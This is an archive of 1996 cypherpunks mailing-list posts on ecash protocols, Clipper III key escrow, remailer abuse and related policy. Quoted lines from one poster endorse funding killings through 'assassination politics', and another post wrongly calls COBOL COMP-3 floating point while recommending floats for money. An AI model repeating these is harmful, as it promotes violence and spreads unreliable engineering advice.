From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Thu, 23 May 1996 06:20:27 +0800
To: cypherpunks@toad.com
Subject: Re: Is Chaum's System Traceable or Untraceable?
In-Reply-To: <199605201902.MAA16278@netcom8.netcom.com>
Message-ID: <4nvd96$4k8@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199605201902.MAA16278@netcom8.netcom.com>,
Bill Frantz <frantz@netcom.com> wrote:
>At  9:10 AM 5/20/96 -0700, Ian Goldberg wrote:
>>However, if you use the "fully anonymous" protocol, change becomes trivial.
>>You don't have to go online; the payer (the shop) does, which it assumedly
>>already is.  Another benefit is that coins received in this way as change
>>are immediately spendable by you, without having to go online in between.
>
>Perhaps I am confused, but I see no need for change in the fully anonymous
>protocol.  I see the fully anonymous protocol as:
>
>(1) The payee generates a coin for the amount of purchase, blinds it and
>gives it to the payer.
>(2) The payer blinds it again and gives it to the bank, which signs it
>debiting the payer's account.
>(3) The payer removes his blinding and gives the signed coin to the payee.
>(4) The payee removes his blinding and deposits the coin.
>
>Step 1 could be called a request for payment (an invoice), step 2 a
>withdrawal, step 3 the payment, and step 4 a deposit.
>
>Is there another version which allows the payee to have an unconnected
>wallet of coins and get change in return?

In the "normal" protocol, the payee has to go online.  In the "anon" protocol,
the payer has to go online.  Since you don't want to go online when you
walk into a shop, you can pay the shop with the "normal" protocol, and
the shop gives you change with the "anon" protocol.

That way, you never need to go online, and your identity is never compromised.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaM4VkZRiTErSPb1AQF8tAQAktvqP2vIKx3igJyfQsFFfJ4PTydBpPrT
W1+uEBIFJgn9sKf+KFXojntn+CKjc6fx0pTBsutXH8UjJxVWZxC1VF7F5jFzCNq3
ZjjkxuX5WrREAZheCu2KydRKVazkEdXVLTPhPHP2D923ZBAOm7B6lCOJ/ykuEaUn
znYuAu1DaOQ=
=rodG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Thu, 23 May 1996 05:38:31 +0800
To: cypherpunks@toad.com
Subject: Re: Is Chaum's System Traceable or Untraceable?
In-Reply-To: <v02140b0aadc66b47f5b3@[206.170.39.104]>
Message-ID: <4nvdgd$4ll@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02140b0aadc66b47f5b3@[206.170.39.104]>,
Tim Dierks  <tim@dierks.org> wrote:
>Not that full anonymity isn't a Good Thing, but couldn't this be solved by
>having the merchant (who presumably is on-line) provide PDA <-> mint
>connectivitiy for the purposes of getting change, exchanging coins, etc.?
>My assumption is that all the ecash protocols are not subject to a MITM
>attack, which I would just presume to be good practice.

But if you go online, you give away your identity due to a timing coincidence.
>
>Also, given the fully anonymous protocol as you've described it (both payor
>and payee blind the coins), what's to prevent the merchant from depositing
>your change before he gives it to you? Unless your PDA is online, you'll be
>home before you find out the hot dog vendor shorted you. (It's my
>understanding that the current digicash system does not support Chaum's
>method of revealing the identity of double-spenders).

That's another of the cool features of the "anon" protocol: the coin isn't
complete until the protocol is finished.  The hot-dog vendor doesn't have
enough information to spend the coin.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaM5QUZRiTErSPb1AQH8FgP6A6eCI7dqEMUf27x/dsZjN5rp9fGWuhaf
/DSQ2CAbdvBqpoYh4uMLkEMSD9WCD+NoV4Uy8MIkxLV+nUz2ZmkEqW+zHRy7zv9G
Ag923kzlY8cLt3730EFz+WC64fOORz8UroBO53QDxvRP3RyiddZx4fw0LeP1YgiW
urXhLYM3N+k=
=axOu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 23 May 1996 06:09:27 +0800
To: cypherpunks@toad.com
Subject: Floating Point and Financial Software
Message-ID: <199605221618.JAA04180@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


There seem to be a few mini-flames on the list over whether
floating point data representations are appropriate for financial
software.

In a nutshell, the answer is "YES", and the use of floating point
arithmetic is common in such applications.

One argument heard against the use of floating point is that it
is inherently "imprecise." In reality, floating point
representations and the results of floating point operations are
perfectly well defined, and the points on the real number line
which are exactly representable by double-precision floating
point values are usually a superset of those representable by the
default integer on most machines.

Storing monetary values as double-precision floats having integer
values in cents is even common in COBOL programs, where the
"COMP-3" data type allows the use of fast floating point in lieu
of the default and slow manipulation of packed decimal and
decimal data.

It is even common in certain CPUs, like CDC Mainframes and
SPARCS, which are primarily floating point engines, to omit
integer divide and sometimes even multiply, and to provide a
subroutine which employs floating point calculations to emulate
these operations. This is completely transparent to the user of
the machine, and there is no problem in using floating point to
do integer operations.

In fact, when running financial applications on large engineering
mainframes, which generally lack a business instruction set,
floating point is not only commonly employed, it is the obvious
way to get the maximum performance out of the machine.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 23 May 1996 05:34:28 +0800
To: cypherpunks@toad.com
Subject: Re: TCM: mafia as a paradigm for cyberspace
In-Reply-To: <199605220934.CAA29479@mail.pacifier.com>
Message-ID: <Pine.LNX.3.93.960522094539.1064A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, jim bell wrote:
> At 03:55 PM 5/21/96 -0500, snow wrote:
> >On Mon, 20 May 1996, Vladimir Z. Nuri wrote:
> >> the assassination politics is quite Hitleresque at its root.
> >> "kill our enemies, and everything will be better. it is our enemies
> >> that are the root of all evil in the world. extinguish them, and
> >> you solve all problems automatically"
> >	
> >	It is more the MAD theory brought down to the personal level.
> 
> With all due respect, I think that comparison is a bit flawed.  MAD (mutual 

	You are right. It is flawed. 

> more,  you'd better not be a crook!

	Or turn in too powerful a crook. Law enforcement won't just go
away. There will always be those of us who feel that most crimes _don't_
deserve the Death Penalty, and that some sort of penal system will
continue to be necessary. In your system this would not be possible
because most people would be afraid to turn people in for fear of
reprisal. 

	I think that the biggest flaw in your system is the belief that
people will act rationally. Do you think that the Menendez(sp?) brothers
would have hesitated one second in having there parents offed to collect
the inheretance? 

> >Note: I don't necessarily think that AP is a good idea. I think
> >that people should do their own dirty work.
> 
> In practice, I think this would be comparatively common as well.  What 
> currently deters such "take the law into your own hands" is the fact that 
> police (being, essentially, in the business of protection) don't want you to 
> provide for yourself by protecting yourself.  They make it hard on people, 
> in the same way they did with Bernard Goetz, the guy who shot four muggers 
> on the New York city subway system.  Once AP gets rid of the police, it will 
> be much easier to protect yourself and not risk jail time, etc.

	Umm... I think that the biggest reason that the Police don't want
you taking the law into your own hands is that civilians tend to screw up
badly. They get the wrong target, they don't stop when they should etc. 
	The POLICE usually don't have a problem with an individual
protecting themselves (as long as the response fits the crime, killing a
shoplifter is a no no.) It is the court system that frowns on it.

	Is there the ability to predict a "mild beating" with your system?
or a "severe beating", or simply a killing? Having one level of punishment
is not a very good legal system. AP cannot replace it. 

 
> Superficially, a person might argue that the lack of police would also make 
> it easier for the muggers.  However, a "professional mugger" would make a 
> LOT of enemies, and it wouldn't take long before he's dead.  He'd only have 
> to be caught once.  Any victim of any mugger would be happy to donate to see 
> him gone.

	Give me the name of a mugger. 

> 
> Right.  Moreover,  I believe that governments simply cannot exist as we know 
> them under these circumstances.  Besides, they won't be necessary.

	See, you have far more faith in humanity than I do. 
	

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Thu, 23 May 1996 08:34:06 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <2.2.32.19960522172644.006bb3f4@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 AM 5/22/96 EDT, E. ALLEN SMITH wrote:

>	Would you suspect that having more warning labels (before & after,
>not just in the headers) would help with any negative reputation thus
>generated?

Probably not. Does it really matter how many times I tell you "I'm not being
a jerk" if everything I send you is in fact jerky? (FBI and "this is not an
assault", anyone?)

Pointing people at legitimate uses of anonymity, as various folks have
suggested, is undoubtedly a good idea. Would anyone care to suggest a few
newsgroups where the vast majority of anonymous posts have really good
reasons for being so?

In cases where there's been serious abuse of remailers that's been caught
and dealt with, some PR on the part of remailer operators might go a long
way toward helping things. "Yes, this person was doing loathsome things, but
we put a stop to it [insert details here."

>put into public view... I see no reason to give lawyers more of a privilege
>than religious/psychiatric individuals.

Ditto. Likewise, I liked the instance last year of a student applying for
the mail logs of the local (state?) government. It is Good for rulers to
feel the same weight of the rules they impose on others.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 23 May 1996 07:47:20 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper III analysis
Message-ID: <199605221756.KAA01022@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


John Gilmore wrote an excellent description of GAK 3 (aka Clipper III, aka
Enabling Privacy, Commerce, Security and Public Safety in the Global
Information Infrastructure).  Here are a couple of other points that even
the proponents of this scheme should agree to:

(1) GAK3 does not provide for the significant public purpose of protecting
dissident groups under repressive regimes.  Human rights groups in
Bosina/Serbia have used PGP to protect their files.  Since their computers
have been frequently seized, the only protection for those people who have
made human rights complaints has been that the local government has not had
access to the keys.

(2) The paper fails to differentiate between the needs of communication
privacy and data storage privacy.  No rational person would want to GAK
their communication keys.  Data lost because keys are lost can always be
retransmitted.  Since communications are easy to intercept, having a long
term GAK key greatly increases the chances that the long term key will be
stolen and the session keys intercepted.  Communication session keys should
be decided by techniques such as Diffie Hellman which ensure that the only
entities with access to the key are the programs/hardware at each end of
the link.

A better case for escrowing long term data storage keys can be made. 
Physical security provides some protection for the cyphertext.  Loss of a
key can mean loss of the data.  However, it is not clear why encrypting for
data storage is any different from storing confidential data in a safe.  If
the government has a legitimate need to access the data, they can access it
through the same legal processes they use to access data in safes.  While
long term data storage can use escrow agents, it does not need GAK for any
legal public purpose.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 23 May 1996 08:32:47 +0800
To: /dev/null <declan+@CMU.EDU>
Subject: Re: FTC online workshop on privacy
In-Reply-To: <glckRlq00YUzM2Wv4o@andrew.cmu.edu>
Message-ID: <Pine.GUL.3.93.960522110634.13930E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, Declan B. McCullagh wrote:

> The legislation being introduced at 10:30 am will restrict selling
> mailing lists with childrens' names and other identifying info on them,
> including email lists. Another attempt to regulate the net, or a good
> thing?

I'd have to see the bill, but I think it's a good general idea, provided
there's the caveats KNOWINGLY and WITHOUT THEIR [parent/guardian's]
KNOWLEDGE. As much as I hate direct marketers, I don't want them subject
to malicious and arbitrary prosecution because one address out of
thousands happens to belong to a kid. 

On second thought, why are kids different than adults? Selling lists of
women? Gays? Kids aren't the only group subject to harassment.

> Supporting is Christian Coalition, Family Research Council, Enough is
> Enough!, Bruce "I wrote the CDA" Taylor's group, and EPIC.

They're not *always* wrong. Oh, EPIC too, eh?

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 23 May 1996 08:10:42 +0800
To: "Joseph M. Reagle Jr." <cypherpunks@toad.com
Subject: Re: Another Analysis -- Re: NIST Draft Key Escrow Paper
Message-ID: <199605221827.LAA23713@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:35 AM 5/22/96 -0400, Joseph M. Reagle Jr. wrote:
>Declan McCullagh and Gilmore have already provided a brief summary of the
>doc, here are a few thoughts I sent to some others last night:

[schtuff deleted]

>So Clipper III is a bit meaner and leaner. If Clipper I would have sunk
>because of sheer clumsiness, a sleeker ship carrying the same load will now
>be developed by the free market. The load is the assumption that citizens
>can be "compelled in any criminal case to be a witness against himself."

I didn't notice any specific reference to the difference between materials 
encrypted for long-term storage or transmission (data, email) and on the 
other hand audio telephone communications, the original stated application for the 
Clipper chip.  I can't see any reason that an individual would want the key 
to his own crypto telephone keys escrowed; unlike the key for data on a computer, 
which at least theoretically might be lost, the cryptophone data is by 
definition lost as soon as it is used.  Therefore, I can see no argument 
which would make a person support this key escrow for that purpose.  Since 
the whole system is supposed to be "voluntary", who is going to accept this?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Thu, 23 May 1996 05:07:39 +0800
To: cypherpunks@toad.com
Subject: Another Analysis -- Re: NIST Draft Key Escrow Paper
Message-ID: <9605221534.AA03805@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh and Gilmore have already provided a brief summary of the
doc, here are a few thoughts I sent to some others last night:

 - the meat is in the footnotes.
 - buzzword compliance: key recovery and Key Management Infrastructure (KMI).
 - intro: market forces and government/industry cooperation.

 - key bullet points:

     o Certificate authorities will operate within performance standards set by 
     legislation
     o Agreements between governments will serve as the basis for international 
     cross certification.
     o Self-escrow will be permitted under specific circumstances. [1]

     [1] The escrow agency must meet performance requirements for law 
     enforcement access.

- Denning's CACM survey key escrow article and Hoffman's "Building in Big
Brother" are cited.

- A lot of talk about "mutually trusted CAs" A footnote [4] "A mutually
trusted authority is an escrow agent trusted by users to store keys and
trusted by law enforcement to provide access upon certification of lawful
authority." One has freedom to choose any CA, as long as the mutual trust
exists.

- At the international level "Law enforcement and some national security
concerns would be protected since government agencies would be able to
obtain escrowed key pursuant to government-to-government agreements."

- Products can be exported to countries with these agreements.

- Self escrow: "To avoid this risk [of investigations being compromised],
independent escrow authorities could be added as another layer. Such a
solution would drive up the cost to operate the PKI and drive down the
efficiency of conducting public key certification functions, particularly
for individual users." [Ok, so independent CAs are "bad" things"] "The
solution may be a national policy which allows CAs for an organization to be
escrow authorities if they can reliably turn over keys in a timely fashion
when requested and to protect the confidentiality of any request for
escrowed key. To this end, the government should seek legislation that would
shield organization certificate authorities from internal pressures in the
course of law enforcement investigations." [A "good" thing?]

- provisions for legislation on civil or criminal liability on the
commercial/private side.

- gives requirements for KMI: key integrity, key accessibility, key recovery
with respect to confidentiality, availability and responsiveness (24 hours)
requirements.

So Clipper III is a bit meaner and leaner. If Clipper I would have sunk
because of sheer clumsiness, a sleeker ship carrying the same load will now
be developed by the free market. The load is the assumption that citizens
can be "compelled in any criminal case to be a witness against himself."

_______________________
Regards,            We could never learn to be brave and patient, 
                    if there were only joy in the world. -Helen Keller
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@vtw.org (Shabbir J. Safdar)
Date: Thu, 23 May 1996 05:39:57 +0800
To: cypherpunks@toad.com
Subject: REMINDER: Leahy at Hotwired 5/22/96 4pm EST
Message-ID: <199605221538.LAA14006@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


------
Date: May 22, 1996 (THIS IS TODAY)

Senator Patrick Leahy (D-VT) will be on HotWired TODAY, May 22nd at 4pm
EST at http://www.hotwired.com/wiredside/  You can tune in and listen
to the chat with the RealAudio software (http://www.realaudio.com).
You can ask questions of the Senator through a moderator and get real,
immediate responses.

Topics likely to be covered: Clipper I/II/III and Net Censorship

-Shabbir J. Safdar
 shabbir@vtw.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bobpal@cdt.org (Bob Palacios)
Date: Thu, 23 May 1996 07:28:58 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.20 - Clinton Administration Floats Clipper III Draft
Message-ID: <v02140b11adc8e986f741@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 20
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 20                         May 22, 1996

 CONTENTS: (1) Clinton Administration Floats Clipper III Key-Escrow Proposal
           (2) Join Sen Leahy TODAY (5/22) At HotWired to Discuss
               His Crypto Bill
           (3) Subscription Information
           (4) About CDT, contacting us

  ** This document may be redistributed freely with this banner in tact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
-----------------------------------------------------------------------------
(1) CLINTON ADMINISTRATION FLOATS 'CLIPPER III' KEY ESCROW PROPOSAL

The Clinton Administration Tuesday (5/21) unveiled a new encryption policy
proposal which would use a government-sanctioned key certification system
as an incentive to virtually impose key escrow on domestic users.

The draft proposal, "Achieving Privacy, Commerce, Security and Public
Safety in the Global Information Infrastructure" (already dubbed Clipper
III), seeks to establish a "public key infrastructure" for encryption.
Broadly speaking, a public key infrastructure would enable users to clearly
identify the people they are communicating with and facilitate key
management, and is widely viewed as an important component of a secure and
trusted communications environment. However, the Clipper III would
establish this infrastructure at a price: All users of the public key
infrastructure would have to ensure government access to their encryption
keys through an approved key escrow authority.

A detailed analysis of the Administration's latest draft proposal is
attached below. Among other concerns:

* The proposal is hardly voluntary - Key-escrow would become a
  prerequisite for participation in the Global Information
  Infrastructure.

* The proposal contains few guidelines for how keys would be shared with
  foreign governments.

* The proposal encourages the collection of highly sensitive private key
  information.

* The proposal does not address major privacy concerns such as liability
  for key holders, limitations on law enforcement access, audit
  requirements, and other concerns that many have already identified as
  crucial to protecting individual privacy even in a voluntary key
  escrow system.

CDT believes that the Administration's draft proposal does not meet the
privacy and security needs of Internet users or the demands of the
marketplace.  While the proposal represents real progress by the
Administration in recognizing the importance of encryption and the value of
a public key infrastructure, in reality it provides few provisions to
protect individual privacy.  Moreover, the Clipper III proposal, like its
predecessors, continues to put law enforcement and national security
concerns above the privacy and security needs of the American public.

The latest Administration proposal comes in the midst of Congressional
efforts to relax encryption export controls and encourage the widespread
use of strong, easy-to-use encryption and prohibit the government from
imposing key escrow domestically.  It also comes in the wake of a letter
signed by over 27 Representatives last week urging the Administration to
abandon its key-escrow initiative (See CDT Policy Post 2.19)

A copy of the Draft proposal is available on CDT's encryption policy web
page (http://www.cdt.org/crypto).

SUMMARY OF THE PROPOSAL:
------------------------

Taking a nod from the efforts currently under way through the European
Commission to establish a Public Key Infrastructure (PKI) in Europe, the
Clipper III seeks to establish a means of ensuring authentication and key
management for Americans.

Among other things, the Clipper III draft proposal:

* RECOGNIZES THAT THE GOVERNMENT SHOULD NOT IMPOSE ENCRYPTION STANDARDS
  ON MARKET: One positive element of the new proposal is an explicit
  recognition of the importance of encryption and the need for private
  sector, as opposed to government solutions.  The draft states,
  "Government can no longer monopolize state of the art cryptography ...
  It is unrealistic to believe that government can produce solutions
  which keep ahead of today's rapidly changing information technology".

* ESTABLISHES KEY MANAGEMENT INFRASTRUCTURE: The draft proposal would
  create a new public key infrastructure designed to tie individuals
  and entities to their public keys.

* RELAXES EXPORT CONTROLS FOR KEY ESCROW PRODUCTS: The new draft would
  continue and expand the effort started with the Clipper II proposal by
  allowing the export of software with 64 bit key lengths (80 bits for
  hardware) on the condition that products contain a key-escrow
  function. Keys could be escrowed in the United States or where the
  US has a bilateral escrow agreement. Other exports to certain markets
  would be considered on a case-by-case basis.

* PROVIDES FOR 'SELF ESCROW' OF ENCRYPTION KEYS:  Self Escrow (where
  a corporation or individual could become an escrow agent for its own
  private keys) would be permitted, though the exact conditions of and
  obligations are not specified in the draft.

MAJOR FLAWS IN THE CLIPPER PROPOSAL RENDER IT A NON-STARTER
-----------------------------------------------------------

* CLIPPER III IS NOT VOLUNTARY & MAKES KEY-ESCROW A PRECONDITION FOR
  PARTICIPATION IN THE GLOBAL INFORMATION INFRASTRUCTURE

While the Administration deserves credit for recognizing that a trusted
public key infrastructure is an important component of a workable National
Encryption policy, the latest proposal attempts to use the need for a
public key infrastructure as a means to impose key escrow domestically.
Although the Administration has repeatedly stressed that any key-escrow
initiative would be a voluntary system, the text of the latest draft
directly contradicts that contention.

The proposal states that in order to participate in the Global Information
Infrastructure, users will need to escrow their keys; if they choose not to
participate in the key infrastructure, "users cannot know with whom they
are dealing on the network, or sending money too, or who signed a document,
or if the document was intercepted and changed by a third party." (page 3).

The proposal goes on to state:

  "To participate in the network a user needs a public key certificate
  signed by a CA [Certification Authority] which 'binds' the user's
  identity to their public key.  One condition of obtaining a
  certificate is that sufficient information (e.g., private keys or
  other information as appropriate) has been escrowed with a certified
  escrow authority to allow access to a user's data or communications."
  (page 5)

In other words, the Clipper III proposal would require individuals and
businesses to use key-escrow encryption as a condition of participating in
the Global Information Infrastructure.  Under the proposal, an individual
cannot obtain certification by a Key Certification Authority (a necessity
under the Clipper III scheme) unless he or she registers with a "certified
escrow authority".

There is no technical or structural reason (beyond law enforcement access)
why key escrow must be a component of a public key infrastructure.  In
fact, a robust example of a public key infrastructure exists today for
exchanging PGP keys (the PGP public key server at MIT
<http://www-swiss.ai.mit.edu/~bal/pks-toplev.html>).

* CLIPPER III TARGETS DOMESTIC USERS

While export controls have ostensibly been aimed at controlling the use of
encryption by foreign users (and indirectly, at domestic users as well),
the Clipper III proposal is aimed directly at the domestic use of
encryption and seeks to establish a system whereby key escrow becomes a
de-facto component of domestic encryption products.

* RAISES MAJOR QUESTIONS WITH RESPECT TO INTERNATIONAL KEY EXCHANGE

In order to work, Clipper III assumes bi-lateral agreements between the US
and other countries with respect to law enforcement access to escrowed
keys, who could legally be an escrow agent, and other factors.  Currently
no such agreements exist.  Bilateral agreements also raise important
privacy issues, including how to deal with releasing keys to foreign
governments, particularly those without any tradition of privacy
protections. Finally, a patchwork of international agreements can create
problems for interoperability.  The same encryption and or authentication
scheme exportable to Germany or England might not be exportable to India or
China in the absence of a appropriate bi-lateral agreements.

* CONTAINS NO PRIVACY PROTECTIONS/RESTRICTIONS ON LAW ENFORCEMENT ACCESS
  TO ESCROWED KEYS:

Like Clipper and Clipper II, the latest proposal does not squarely address
standards for law enforcement access to escrowed keys, unauthorized
disclosure of keys by escrow agents, and other privacy issues associated
with key escrow.

* CREATES VULNERABILITY AND INSECURITY BY ENCOURAGING STORAGE OF PRIVATE
  KEYS:

The proposal suggests that escrow agents hold either a user's private key
or "other information as appropriate".  Allowing escrow agents to
accumulate private keys creates severe vulnerabilities in the network.
Once a private key is disclosed (either to law enforcement or to an
unauthorized third party), *every* communication using that key is
compromised. Although the draft does attempt to limit this concern by
allowing escrow agents to hold "other information", the proposal no where
specifies what that would be.

NEXT STEPS
----------

Congress is currently considering legislation which would head off the
Administration's efforts to encourage domestic key-escrow encryption
schemes and promote the widesprad avaiability of strong, easy-to-ues
encryption technologies.

Several bills, including S.1726 (the Pro-CODE bill) sponsored by Senators
Burns (R-MT), Leahy (D-VT), Dole (R-KS), Pressler (R-SD), Wyden (D-OR) and
others, along with HR 3011, sponsored by Reps Goodlatte (R-VA), Eshoo
(D-CA), Campbell (D-CA) and over 25 others are currently being considered
by Congress. Both bills would relax export restrictions and prohibit the
government from imposing key escrow domestically.

CDT looks forward to working with Members of Congress to pass legislation
that encourages the widespread availability of strong, easy-to-use
encryption technologies based on marketplace, not government, standards.

-----------------------------------------------------------------------

(2) JOIN SENATOR LEAHY TODAY (Wed 5/22) TO DISCUSS PRIVACY AND SECURITY ONLINE

Senator Patrick Leahy (D-VT), the "Senior Senator from Cyberspace", ardent
proponent of Net.Freedom and co-sponsor of 2 bills to repeal encryption
export controls, will hold an online "town meeting" on Wednesday May 22 to
discuss privacy and security online.

DETAILS ON THE EVENT

* Wednesday May 22, 4 - 5 pm ET (1 pm Pacific) on HotWired

   URL: http://www.hotwired.com/wiredside/

 To participate, you must be a registered HotWired member (there
 is no charge for registration).  You must also have RealAudio(tm) and
 a telnet application properly configured to work with your browser.

 Please visit http://www.hotwired.com/wiredside/ for information on how you
 can easily register for Hotwired and obtain RealAudio.

Wednesday's town meeting is another in a series of planned events, and is
part of a broader project coordinated by CDT and the Voters
Telecommunications Watch (VTW) designed to bring the Internet Community
into the debate and encourage members of Congress to work with the
Net.community on vital Internet policy issues.

Events with other members of Congress working on Internet Policy Issues are
currently being planned. Please check http://www.crypto.com for
announcements of future events

------------------------------------------------------------------------
(3) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
more than 9,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.20                                           5/22/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Thu, 23 May 1996 06:43:57 +0800
To: cypherpunks@toad.com
Subject: Re: FTC online workshop on privacy
In-Reply-To: <glckRlq00YUzM2Wv4o@andrew.cmu.edu>
Message-ID: <9605221603.AA0058@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Declan B McCullagh" <declan+@CMU.EDU> writes:

  > The legislation being introduced at 10:30 am will restrict selling
  > mailing lists with childrens' names and other identifying info on
  > them, including email lists. Another attempt to regulate the net,
  > or a good thing?

  > Supporting is Christian Coalition, Family Research Council, Enough
  > is Enough!, Bruce "I wrote the CDA" Taylor's group, and EPIC.

Bwahahahaha...  

So selling mailing lists which identify children is bad, but adding
"I'm a minor" tags to TCP/IP packets is good?

OK, so where's that Lolita Filter source code again...

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Thu, 23 May 1996 15:03:10 +0800
To: "'cypherpunks@toad.com>
Subject: RE: CDT Policy Post 2.20 - Clinton Administration Floats Clipper III Draft
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960522190514Z-17357@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From the Proposal:

  "To participate in the network a user needs a public key certificate
  signed by a CA [Certification Authority] 
	
	which 'binds' the user's identity to their public key.
  
  One condition of obtaining a certificate is that sufficient
information 
  (e.g., private keys or other information as appropriate) has been
  escrowed with a certified escrow authority to allow access to a 
  user's data or communications."
......................................................................


Along with the escrow requirement, I keep seeing in here somewhere the
eventuality of a tie being established between public keys and a
national identifying scheme, possibly to update and replace the present
Social Security system.

    ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leonard Janke <janke@unixg.ubc.ca>
Date: Thu, 23 May 1996 12:14:54 +0800
To: cypherpunks@toad.com
Subject: (Another) alternative to remailer shutdowns
Message-ID: <Pine.SOL.3.91.960522114403.19500A-100000@netinfo.ubc.ca>
MIME-Version: 1.0
Content-Type: text/plain



Instead of having the last remailer in the chain store the plaintext of
an encrypted anonymous message, it might be more convenient to have the 
sender split the message into two messages and send these. The first 
message would contain random characters,  and the second would contain 
the xor of these random characters with the anonymous message. By themselves, 
each piece would, of course, be harmless random text, so remailer operators
greatest crime would be spamming. If the two pieces were sent through 
chains with different last remailers, no one operator could be held
accountable, and, of course, it would be ridiculous to suggest that
one operator could be held responsible for that fact that another
sent some random text which happened to be the xor of the random text
another had sent with a harassing message. (For instance, the
other operator could be trying to frame the first, with the
help of the receiver.) It seems to me that the only way to deal with a 
remailing scheme of this kind would be outlaw anonymous remalining in 
general.

Leonard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 May 1996 06:06:56 +0800
